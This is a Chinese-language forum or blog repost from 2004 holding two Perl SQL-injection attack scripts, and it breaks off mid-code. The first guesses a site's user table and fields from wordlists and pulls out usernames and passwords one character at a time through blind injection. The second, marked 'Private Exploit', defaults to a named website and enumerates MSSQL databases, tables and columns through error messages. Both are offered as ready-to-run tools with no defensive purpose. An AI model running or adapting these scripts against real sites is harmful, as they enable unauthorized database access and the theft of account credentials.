首页 电脑 电脑学堂 查看内容

PERL:多线程+中文破解SQL注入猜解机

2004-10-7 07:44 559 0

摘要: 说明:注意请把代码内的所有的∮都替换为$. #!/usr/local/ActivePerl-5.8/bin/perl -w use IO::Socket; use threads; #函数列表;...
关键词: nbsp 20 table field my res name select locat sql

说明:注意请把代码内的所有的∮都替换为$. #!/usr/local/ActivePerl-5.8/bin/perl -w use IO::Socket; use threads; #函数列表; sub gethost {       if(∮url=~/(http:\/\/)?(.+?)\/(.+)/)       {               ∮host=∮2;               ∮path='/'.∮3;               if(∮host=~/(.*):(.*)/)               {                       ∮host=∮1;                       ∮port=∮2;               }       } } sub fieInput {       my ∮field;       open (fieInput,"∮_[0]") or die "can't open file!\n";       while (chomp(my ∮input=<fieInput>))       {               my ∮sql="exists%20(select%20∮input%20from%20∮table_user)";               ∮path1 = "%20AND%20∮sql";               my @res = &connect;               if ("@res"=~/∮info/)               {                       ∮field=∮input;                       print "\t+--  ∮field  --+";                       last;               }       }       close(fieInput);       return ∮field; } sub tabInput {       my ∮table;       open (tabInput,"∮_[0]") or die "can't open file!\n";       while (chomp(my ∮input=<tabInput>))       {               my ∮sql="0<>(select%20count(*)%20from%20∮input)";               ∮path1 = "%20AND%20∮sql";               my @res = &connect;               if ("@res"=~/∮info/)               {                       ∮table=∮input;                       print "\t+--  ∮table  --+\n";                       last;               }       }       close(tabInput);       return ∮table; } sub connect {       ∮req = "GET ∮path∮path1 HTTP/1.0\n".       "Host: ∮host\n".       "Referer: ∮host\n".       "Cookie: \n\n";       my ∮connection = IO::Socket::INET->new(Proto =>"tcp",       PeerAddr =>∮host,       PeerPort =>∮port) ││ die "Sorry! Could not connect to ∮host \n";       print ∮connection ∮req;       my @res = <∮connection>;       close ∮connection;       return @res; } sub crack { my(@dic) = @_; my ∮sql=pop(@dic); my ∮i=0; my ∮op=1; my ∮crack; foreach my ∮pass(@dic) {       print ">";       ∮i++;       ∮crack+=∮op*∮pass;       ∮path1 = "%20AND%20∮crack<(∮sql)";       my @res = &connect;       if ("@res" =~ /∮info/)       {               ∮op=1;               if(∮i==@dic)               {                       ∮crack++;               }       }       else       {               ∮op=-1;       } } return ∮crack; } sub asc {       my ∮asc=∮_[0];       my ∮str;       if (∮asc<256)             {             ∮str = pack('C*',∮asc);             }       else       {       ∮asc*=-1;       ∮str = sprintf("%X",∮asc);       if (∮str=~/(.{4})∮/i)       {               ∮str=∮1;       }       ∮str = pack("H*",∮str);       }       return ∮str; } #初始化变量; ∮url=''; ∮host=''; ∮path=''; ∮info=''; ∮port=80; @dic1=(128,64,32,16,8,4,2,1); @dic2=(16,8,4,2,1); @dic3=(64,32,16,8,4,2,1); @dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1); print "\n\n"; print "\t* The script Crack user&pass for Sql-injection system *\n"; print "\t* hemon @ East China Jiaotong Univercity , 2004.5 *\n"; print "\t* E-mail : the108one @ yahoo.com.cn    QQ :24303484 *\n"; #取得主机地址、路径; ∮ARGC = @ARGV; ∮url = ∮ARGV[0]; ∮info = ∮ARGV[1]; if (∮ARGC != 2) { print "\n\t* Please input the url : *\n"; chomp(∮url=<STDIN>); print "\n\t* Please input the infomation : *\n"; chomp(∮info=<STDIN>); } &gethost; print "\n\n开始在 ∮host 上进行测试,请等待......\n\n"; #猜解;   print "+--  Table  --+";   ∮table_user=&tabInput('table_user.txt');   print "+--  Filed  --+";   my ∮thread1  = threads->create("fieInput","field_Username.txt");   my ∮thread2  = threads->create("fieInput","field_password.txt");   my ∮thread3  = threads->create("fieInput","field_id.txt");   ∮field_Username = ∮thread1->join();   ∮field_password = ∮thread2->join();   ∮field_id = ∮thread3->join();   print "\n\n";   ∮sql="select%20min(∮field_id)%20from%20∮table_user";   ∮id=&crack(@dic1,"∮sql");   ∮sql="select%20len(∮field_Username)%20from%20∮table_user%20where%20∮field_id=∮id";   my ∮thread4  = threads->create("crack",@dic2,∮sql);   ∮sql="select%20len(∮field_password)%20from%20∮table_user%20where%20∮field_id=∮id";   my ∮thread5  = threads->create("crack",@dic2,∮sql);   ∮userlen = ∮thread4->join();   ∮passlen = ∮thread5->join();   for (my ∮locat=1;∮locat<=∮userlen;∮locat++)   {       ∮sql="select%20asc(mid(∮field_Username,∮locat,1))%20from%20∮table_user%20where%20∮field_id=∮id";       ∮path1 = "%20AND%200>(∮sql)";       my @res = &connect;       if ("@res" =~ /∮info/)       {             ∮sql="select%20abs(asc(mid(∮field_Username,∮locat,1)))%20from%20∮table_user%20where%20∮field_id=∮id";             ∮username[∮locat] = threads->create("crack",@dic4,∮sql);       }       else       {             ∮username[∮locat] = threads->create("crack",@dic3,∮sql);       }   }   for (my ∮locat=1;∮locat<=∮passlen;∮locat++)   {       ∮sql = "select%20asc(mid(∮field_password,∮locat,1))%20from%20∮table_user%20where%20∮field_id=∮id";       ∮path1 = "%20AND%200>(∮sql)";       my @res = &connect;       if ("@res" =~ /∮info/)       {             ∮sql="select%20abs(asc(mid(∮field_password,∮locat,1)))%20from%20∮table_user%20where%20∮field_id=∮id";             ∮password[∮locat] = threads->create("crack",@dic4,∮sql);       }       else       {             ∮password[∮locat] = threads->create("crack",@dic3,∮sql);       }   }   for (my ∮locat=1;∮locat<=∮userlen;∮locat++)   {        ∮username[∮locat] = ∮username[∮locat]->join();   }   for (my ∮locat=1;∮locat<=∮passlen;∮locat++)   {        ∮password[∮locat] = ∮password[∮locat]->join();   }   print "\n\n\t+--  ∮field_Username  --+\t";   for (my ∮locat=1;∮locat<=∮userlen;∮locat++)   {        ∮username[∮locat] = &asc(∮username[∮locat]);        print "∮username[∮locat]";   }   print "\n\t+--  ∮field_password  --+\t";   for (my ∮locat=1;∮locat<=∮passlen;∮locat++)   {        ∮password[∮locat] = &asc(∮password[∮locat]);        print "∮password[∮locat]";   }   print "\n\n";   system('pause'); =================#!/usr/bin/perl #Private Exploit!Don't distributed it! ∮|=1; use Socket; use Getopt::Std; getopt('hpwtdi'); ∮host=∮opt_h || "www.vod999.com"; ∮port=∮opt_p || 80; ∮path=∮opt_w || "/movie_detail.asp?movie_m1id=1264"; ∮type=∮opt_t || "table_scan"; ∮database=∮opt_d; ∮tab_id=∮opt_i; usage(); if(∮type eq "table_scan") {    scan_db();    print "\nDatabase name scan complete!\n===================================\n";    foreach  (@sqldb)    {        print "∮_\n";    }    print "===================================\n";               scan_table(@sqldb);    for(∮i=0;∮i<@sqldb;∮i++)    {        print "\n\n==============   ∮sqldb[∮i]   ==============\n\n";        @tb=split(/n/,∮table_name[∮i]);        @tbid=split(/n/,∮table_id[∮i]);        for(∮j=0;∮j<@tb;∮j++)        {            print "| ∮tb[∮j](∮tbid[∮j])\t";        }    } } elsif((∮type eq "column_scan") && (∮database ne "") && (∮tab_id ne "")) {    scan_columns(∮database,∮tab_id);    print "\n==============   ∮database.dbo.∮tab_id   ==============\n\n";    foreach  (@columns)    {        print "| ∮_\t";    } } sub sendraw {    my (∮req) = @_;    my ∮target;    ∮target = inet_aton(∮host) || die("inet_aton problems\n");    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");    if(connect(S,pack "SnA4x8",2,∮port,∮target)){        select(S);    ∮| = 1;        print ∮req;    my @res = <S>;        select(STDOUT);    close(S);        return @res;    }    else {    die("Can't connect...\n");    } } sub scan_db() {    my ∮i=7;    my ∮req,∮get;    my ∮db=1;    my @res;    while(∮db ne "not found")    {        ∮get=∮path."%20and%200<>(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20name>1%20and%20dbid=∮i)";        ∮req=    make_request(∮get);        @res=sendraw(∮req);        ∮db=findstr(@res);        if(∮db ne "not found")        {            @sqldb=(@sqldb,∮db);        }        ∮i++;    } } sub findstr {    my @tmpres=@_;    my ∮tmpline;    my ∮s1,∮s2,∮s3;    foreach ∮tmpline (@tmpres)    {        if(∮tmpline=~/char 值.*转换/isg)        {            ∮s1=0;            ∮s2=0;            ∮s3=0;            (∮s1,∮s2,∮s3)=split(/'/,∮tmpline);            ∮s2=~s/ //isg;            print ".";            if(length(∮s2) > 1)            {                return ∮s2;            }        }    }        return "not found"; } sub scan_table {    my @db=@_;    my ∮req,∮get;    my ∮table=1;    my @res;    my ∮tmpstr1;    my ∮i=0;    my ∮tableid;    foreach ∮db_name (@db)    {        ∮tmpstr1="";        ∮table=1;        ∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U')";        ∮req=    make_request(∮get);        @res=sendraw(∮req);        ∮table=findstr(@res);        ∮table_name[∮i]=∮table_name[∮i]."∮table\n";        ∮get=∮path."%20and%200<>(select%20count(*)%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='∮table'%20and%20uid>(str(id)))";        ∮req=    make_request(∮get);        @res=sendraw(∮req);        ∮tableid=findstr(@res);        ∮table_id[∮i]=∮table_id[∮i]."∮tableid\n";        ∮tmpstr1="'∮table'";        while(∮table ne "not found")        {            ∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name%20not%20in(∮tmpstr1))";            ∮req=    make_request(∮get);            @res=sendraw(∮req);            ∮table=findstr(@res);            if(∮table ne "not found")            {                ∮table_name[∮i]=∮table_name[∮i]."∮table\n";                ∮get=∮path."%20and%200<>(select%20count(*)%20from%20∮db_name.dbo.sysobjects%20where%20xtype='U'%20and%20name='∮table'%20and%20uid>(str(id)))";                ∮req=    make_request(∮get);                @res=sendraw(∮req);                ∮tableid=findstr(@res);                ∮table_id[∮i]=∮table_id[∮i]."∮tableid\n";            }            ∮tmpstr1=∮tmpstr1.",'∮table'";                    }        print "\nDatabase \"∮db_name\" scan complete!\n";        ∮i++;    } } sub scan_columns {    my ∮this_db_name=shift;    my ∮this_table_id=shift;    my ∮get,∮req,∮tmpstr;    my @res;    ∮get=∮path."%20and%200<>(select%20top%201%20name%20from%20∮this_db_name.dbo.syscolumns%20where%20id=∮this_table_id)";    ∮req=    make_request(∮get);    @res=sendraw(∮req);    ∮column=findstr(@res);    @columns=(@columns,∮column);    ∮tmpstr="'∮column'";      while(∮column ne "not found")    {   &
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部